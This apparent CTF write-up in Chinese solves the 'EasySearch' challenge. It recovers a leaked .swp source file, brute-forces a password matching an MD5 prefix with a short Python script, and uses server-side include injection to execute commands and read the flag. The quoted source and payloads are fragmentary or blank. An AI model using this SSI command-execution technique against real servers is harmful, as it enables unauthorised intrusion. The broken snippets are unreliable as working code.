[BJDCTF2020]EasySearch

登录界面

查看源码、sql注入测试,并没有突破口

使用dirsearch 扫描,未能扫描出文件,使用Test404轻量后台扫描器(字典php_bak.txt)发现,有文件index.php.swp泄露。扫描时发现,有大佬说dirsearch 能扫描出来,但是实际发现dirsearch的字典目录里只有“.index.php.swp”,而没有“index.php.swp”,所以要用dirsearch扫描出来,必须指定字典。

index.php.swp源码:

alert('[+] Welcome to manage system')";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            

Hello,'.$_POST['username'].'

*** ***'; fwrite($shtml,$text); fclose($shtml); *** echo "[!] Header error ..."; } else { echo ""; }else { *** } *** ?>

一、代码分析

        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) 

看出password进行md5加密后,前六位与admin相等,所以可以通过脚本进行碰撞,求出password:

import hashlib

for num in range(10000,9999999999):
    pwd = hashlib.md5(str(num).encode()).hexdigest() #md5改为题目需要的算法
    if pwd[0:6] == "6d0bc1":   #对hash的前两位为"0e"的数字进行碰撞
        print(str(num)) #等待执行结束 输出结果
        break

password=2020666

使用admin、2020666登录系统,未发现任何有用的

二、上burpsuit

抓包,发现

HTTP/1.1 200 OK
Server: openresty
Date: Sat, 02 Sep 2023 09:10:44 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Url_is_here: public/500ffee569c40dbb94b9b0b8426ae8f8ff86d201.shtml
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.27
Content-Length: 568

响应里有“public/500ffee569c40dbb94b9b0b8426ae8f8ff86d201.shtml”

Apache SSI 远程命令执行漏洞

当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用语法执行命令。

使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。

三、远程执行命令

1、post payload:

username=&password=2020666

执行后,查看响应头:

Url_is_here: public/61149c955fc1c88e0864f9803b3b750bd0ff0807.shtml

打开“public/61149c955fc1c88e0864f9803b3b750bd0ff0807.shtml”,查看到

Hello,flag_990c66bf85a09c664f0b6741840499b2 index.php index.php.swp public

data: Saturday, 02-Sep-2023 09:19:04 UTC

Client IP: 11.211.81.11

2、post payload:

username=&password=2020666

查看相应头:

HTTP/1.1 200 OK
Server: openresty
Date: Sat, 02 Sep 2023 09:24:28 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Url_is_here: public/65517def766aab584fc82962badd04bc50c54e54.shtml
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.27
Content-Length: 568

打开“public/65517def766aab584fc82962badd04bc50c54e54.shtml”

Hello,flag{34f2a90b-5571-4530-ab88-80a963d4f219}

data: Saturday, 02-Sep-2023 09:24:46 UTC

Client IP: 11.211.81.11

你可能感兴趣的:(CTF,android,数据库,计算机网络,网络安全,web安全,安全威胁分析)